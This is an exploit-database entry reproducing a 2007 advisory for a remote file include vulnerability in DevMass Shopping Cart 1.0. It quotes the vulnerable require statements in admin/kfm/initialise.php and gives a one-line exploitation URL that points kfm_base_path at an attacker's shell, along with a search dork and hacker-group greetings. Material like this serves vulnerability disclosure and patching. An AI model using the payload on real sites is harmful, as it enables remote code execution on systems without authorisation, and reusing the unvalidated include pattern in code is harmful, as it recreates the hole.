DevMass Shopping Cart - exploit.company

vendor:

DevMass Shopping Cart

by:

S.W.A.T.

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: DevMass Shopping Cart

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Unknown

Unknown

DevMass Shopping Cart <= 1.0 Remote File Include Vulnerability

The vulnerability allows an attacker to include a remote file which can lead to remote code execution or other malicious activities. The vulnerable code is located in the file 'admin/kfm/initialise.php' where it includes various files without proper input validation.

Mitigation:

Update to a patched version of the software or implement proper input validation before including files.

Source

Exploit-DB raw data:

========================================================================
||  ##    ##   ##           ##########   #######     ########         ||
||   ##  ##    ##########   ##########   ##   ##     ##               ||
||    ####     ##########   ##      ##   #######     ########         ||
||    ####     ##  ##  ##   ##      ##   #######           ##         ||
||   ##  ##    ##  ##  ##   ##########   ##    ##          ##         ||
||  ##    ##   ##  ##  ##   ##########   ##     ##   ########         ||
========================================================================
========================================================================
[*] DevMass Shopping Cart <= 1.0 Remote File Include Vulnerability    ||
[!] Download   : http://www.devmass.com/downloads/devmass.cart.1.0.tar||
[!] Author     : S.W.A.T.                                             ||
[!] Site       : wWw.XmorS.CoM - wWw.SvvaT.IR                         ||
[!] Y!ID       : Svvateam                                             ||
[!] E-Mail     : S.W.4.T@hackermail.CoM                               ||
[!] Location   : Iran - 071                                           ||
[!] Risk       : Moderate ( High )                                    ||
[!] Dork       : DevMass Shopping Cart                                ||
========================================================================
========================================================================
Vuln. code: admin/kfm/initialise.php            	              ||
                                                                      ||
require $kfm_base_path.'includes/lang.php'; 			      ||
require $kfm_base_path.'includes/db.php'; 			      ||
require $kfm_base_path.'includes/object.class.php';	   	      ||
require $kfm_base_path.'includes/session.class.php'; 		      ||
require $kfm_base_path.'includes/file.class.php'; 		      ||
require $kfm_base_path.'includes/image.class.php'; 		      ||
require $kfm_base_path.'includes/directory.class.php';                ||
                                                                      ||
                                                                      ||
========================================================================
[*] Exploitation :                                                    ||
                                                                      ||
[target]/[path]/admin/kfm/initialise.php?kfm_base_path=[Shell]        ||
								      ||
========================================================================
[!] We Are : Scorpiunix - Kamy4r - S.W.A.T. - D3vil_B0Y_Ir -          ||
[!] The_Editor - Silliconic - Sh3llH3ll                               ||
                                                                      ||
[!] I Love Xmors & All Member Of Them                                 ||
							              ||
[!] DeltaHackingGroup = ( Lammers Group :D ) ,,!,,                    ||
							              ||
[!] Special Thanks To : Dj7xpl From Y! UnderGround Group              ||
								      ||
[!] Tnx 2 : Str0ke - Google - SourceForge                             ||
========================================================================

# milw0rm.com [2007-11-22]